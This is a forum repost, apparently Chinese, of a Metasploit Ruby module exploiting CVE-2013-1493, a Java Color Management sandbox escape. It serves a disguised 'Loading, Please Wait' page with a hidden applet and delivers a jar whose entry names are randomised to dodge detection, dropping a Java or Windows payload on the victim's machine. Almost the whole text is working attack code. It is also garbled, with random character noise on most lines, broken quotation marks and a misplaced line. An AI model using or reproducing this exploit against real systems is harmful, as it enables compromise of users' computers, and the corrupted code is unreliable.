##
/ f& t M* \) l9 T; P: W6 J+ a5 }- n; w5 z3 n
# This file is part of the Metasploit Framework and may be subject to' e& M6 d) Q8 K9 z- U2 P
# redistribution and commercial restrictions. Please see the Metasploit. U2 _ N3 h, X
# web site for more information on licensing and terms of use.
* o8 q# e! ]* J/ q# http://metasploit.com/5 f" c8 s4 _1 S9 S
##
$ {6 e& _, x/ A) X3 Z1 \5 ^( |require ‘msf/core’+ ^4 k: v9 b. a
require ‘rex’
* x+ T' F$ s/ ]4 Cclass Metasploit3 < Msf::Exploit::Remote( k) s6 F6 a. k9 [
Rank = NormalRanking
/ ?0 R( b+ ?2 `: ?2 R+ @) N# c6 T) sinclude Msf::Exploit::Remote::HttpServer::HTML0 k, D) ] E8 y" ?! a! Y
include Msf::Exploit::EXE
( H0 p5 T/ \) O; O7 G2 N9 S* Pinclude Msf::Exploit::Remote::BrowserAutopwn: `: ?( H' }/ }9 b) r% l
autopwn_info({ :javascript => false })9 i" |: G" B8 H- A/ S0 e
def initialize( info = {} )
0 w3 U6 c4 s4 Asuper( update_info( info,
1 p6 q2 ]3 S6 M" ]- H$ H c7 \‘Name’ => ‘Java CMM Remote Code Execution’,7 w, r" I1 m( g, |$ a; t- G
‘Description’ => %q{# y# S+ `: B. O5 E
This module abuses the Color Management classes from a Java Applet to run
3 t: y3 D7 F& \arbitrary Java code outside of the sandbox as exploited in the wild in February
9 ]7 L# }* p' H8 n n1 _and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
8 k8 e6 {& L7 p/ d9 Y/ }0 B! Nand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
7 M+ t* j- X: v3 s9 h- Ssystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
# w% v5 [4 A7 ]warning in order to run the malicious applet./ F4 @3 i k0 C5 X
},
' i; U' G: j& X( x# h‘License’ => MSF_LICENSE,8 Q; G' f. o0 j- B: [
‘Author’ =>3 D5 B" b8 M1 Z* v
'Unknown', # Vulnerability discovery and Exploit
! O7 p6 f. b" `/ h* y; O'juan vazquez' # Metasploit module (just ported the published exploit)
6 F( _ U$ N" C. _' t% L# O* }],
5 V! V+ \' g. W! f; }‘References’ =>' { p: t& h' w1 i' x: c
[
, `' U3 x; g/ c9 H; t[ 'CVE', '2013-1493' ],
5 f; P0 `6 e2 @& h. a[ 'OSVDB', '90737' ],
; D: S/ K/ ?7 n5 q( |+ ][ 'BID', '58238' ],
0 I% _' W& B, E& W7 B0 c[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
- E; H5 G( o1 [( h3 M; v% W[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
4 y( H0 Y3 J; }4 q0 w[ 'URL', 'http://pastie.org/pastes/6581034' ]
9 p- q& p3 S' Y* ^6 d$ W],
7 O" N$ R$ J" r/ t‘Platform’ => [ 'win', 'java' ],6 E1 \# Y5 O/ V6 x
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },/ P% Q+ s! ?1 Y% k
‘Targets’ =>
) O. C* N' |' @5 U[
" V, {7 d' Z' n) n[ 'Generic (Java Payload)',- I7 @5 j* K' a9 k) y. `
{
O$ h' q0 x7 D) G; `'Platform' => 'java',
% j( N* G5 G, h" G7 K'Arch' => ARCH_JAVA
# v+ Y( n# C5 F- A& a: [}
; a* m9 W' Y3 x: _],
6 s% m* \( X6 _. b( p! ]. r[ 'Windows x86 (Native Payload)',
9 J; r) l0 H% b: g8 W{/ v0 q& a/ m1 V: v
'Platform' => 'win',
* K7 p6 L2 M" H" `'Arch' => ARCH_X86
8 X" `) {! D, g5 |$ q}
9 I M4 [: J" g& |]7 v2 [7 M7 E5 v/ @$ e
],
0 i/ ~8 w4 g# f6 n2 H' V: n% J) t, y‘‘DisclosureDate’ => ‘Mar 01 2013′
) k; c- ]; R% y0 W& E; k))
: t1 h3 y6 p0 a8 N8 d+ ?end- X5 X9 j4 u+ H0 v3 S7 M* `8 J
def setup" `$ H9 Z$ T' C1 G, l2 m
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)& g0 \9 k% `7 C+ e' R2 ]) q, \
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }* h& L; _ f- n8 Y7 j9 ]* N& f
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)" ~1 m( u s, p
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ g9 \7 V8 L' d8 t
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”): c' f/ E; s+ G4 n
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }7 ~ E0 j z- r! \" `
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
% Z2 r" z# T8 P% B8 x4 R@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
3 ?1 s& G% J5 E@init_class_name = rand_text_alpha(“Init”.length)6 C/ W$ ]# r- g4 [7 T" p
@init_class.gsub!(“Init”, @init_class_name)
8 K* k1 n0 c0 Ysuper
8 }# C+ ?' y, y! N' K. `end
" A* D. {' M5 k; fdef on_request_uri(cli, request)
4 [: P+ n x$ D! t) Aprint_status(“handling request for #{request.uri}”)! L8 F. Y2 `7 m
case request.uri* o7 \1 I& S# X$ y; P' b
when /\.jar$/i6 H4 N( x' Y2 G2 W3 X9 b& y; A3 p
jar = payload.encoded_jar' q7 g- k0 F; \) z( {+ {
jar.add_file(“#{@init_class_name}.class”, @init_class)
3 f" R) Z- {- l4 C Z% q, Zjar.add_file(“Leak.class”, @leak_class)
" P+ B- }5 {' [/ _- Q9 y* H' j! yjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
5 o8 \1 @; F, l# Qjar.add_file(“MyColorSpace.class”, @color_space_class)
3 h$ H& E! i' L/ H8 VDefaultTarget’ => 1,; o% T! Z5 s) W/ w _! n
metasploit_str = rand_text_alpha(“metasploit”.length)
% B6 `! d4 A0 E+ qpayload_str = rand_text_alpha(“payload”.length)2 r: v1 V( \- T: C: T& o" y3 P
jar.entries.each { |entry|. ~. l/ X$ f( l1 [# r4 n
entry.name.gsub!(“metasploit”, metasploit_str)+ F( I6 e6 W# b* J
entry.name.gsub!(“Payload”, payload_str), ]* @ h% Y. P. i5 x8 N
entry.data = entry.data.gsub(“metasploit”, metasploit_str)8 H0 S( T7 J( @
entry.data = entry.data.gsub(“Payload”, payload_str)" ]" Y0 ]* E7 G
} e6 z! W3 O. ]. u
jar.build_manifest8 I* a0 c( f0 c& E$ v. w
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
) \$ g3 D2 b, r' X6 |0 Hwhen /\/$/2 ^2 T: V/ j( {) u( O, L/ ]+ B; c8 R0 n
payload = regenerate_payload(cli)
) b7 P: P9 S2 i( F* J0 ^3 nif not payload2 k# G3 W7 v9 K `: M
print_error(“Failed to generate the payload.”)8 s+ W& l3 _9 d4 t% s
send_not_found(cli)& G4 ~" x' Z% X, q) V7 }9 y" o
return
) h$ ~+ c% ]8 Q5 ]: i" R8 Vend6 X# {; D3 r' o
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })8 D* W/ c: e: Y7 w5 T
else
/ P/ J( r& F2 J, msend_redirect(cli, get_resource() + ‘/’, ”)
, @9 a6 M' D0 g+ z( t) e$ U! Q1 Rend
6 s) y; y0 J2 s$ Dend
) s* [' W) i1 G0 e. `: T% Gdef generate_html% K, ~. ~$ I: W; J" N! _
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
( e8 l' r) t" q% hhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
/ Z8 E, U. `( d0 Whtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
- L7 r1 }* [% _3 [0 uhtml += %Q|</applet></body></html>|
$ D! ^* L' v7 @return html8 T5 U y1 N `4 W" W
end
- l& U8 @4 F+ E6 v. ^end' `4 v& ~' P/ d; f F, T) e
end/ O7 I! e5 W) z
|
发表于 2013-4-4 17:31:17
收藏
支持
反对